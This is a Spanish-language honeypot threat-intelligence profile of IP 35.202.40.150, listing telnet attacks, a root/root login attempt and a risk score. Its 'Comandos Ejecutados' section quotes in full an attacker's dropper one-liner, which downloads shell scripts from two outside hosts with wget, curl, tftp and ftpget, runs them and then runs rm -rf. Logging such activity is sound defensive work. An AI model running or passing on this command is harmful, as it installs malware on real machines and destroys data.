TROYANOSYVIRUS
Amenaza ActivaBAJO

35.202.40.150

Primera Deteccion31/3/2026
Ultima Actividad31/3/2026
ISPGoogle LLC
🎯
18
Ataques Totales
🔌
1
Puertos
📡
1
Tipos Ataque
🦠
2
Malware

Geolocalizacion

Pais
🇺🇸 Estados Unidos
Ciudad
Council Bluffs
ASN
AS396982
ISP
Google LLC

Tipos de Ataque

ssh_telnet_honeypot

Puertos Atacados

23

Malware Asociado

Credenciales Intentadas

🔐root/root
2x

Comandos Ejecutados

$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://38.83.138.59:25884/nz.sh; curl -O http://38.83.138.59:25884/nz.sh; chmod 777 nz.sh; sh nz.sh; tftp 165.22.252.236 -c get nz.sh; chmod 777 nz.sh; sh nz.sh; tftp -r 3.sh -g 165.22.252.236; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 165.22.252.236 2.sh 2.sh; sh 2.sh; rm -rf nz.sh nz.sh 3.sh 2.sh; rm -rf *2x

Evaluacion de Riesgo

25
/100
BajoMedioAltoCritico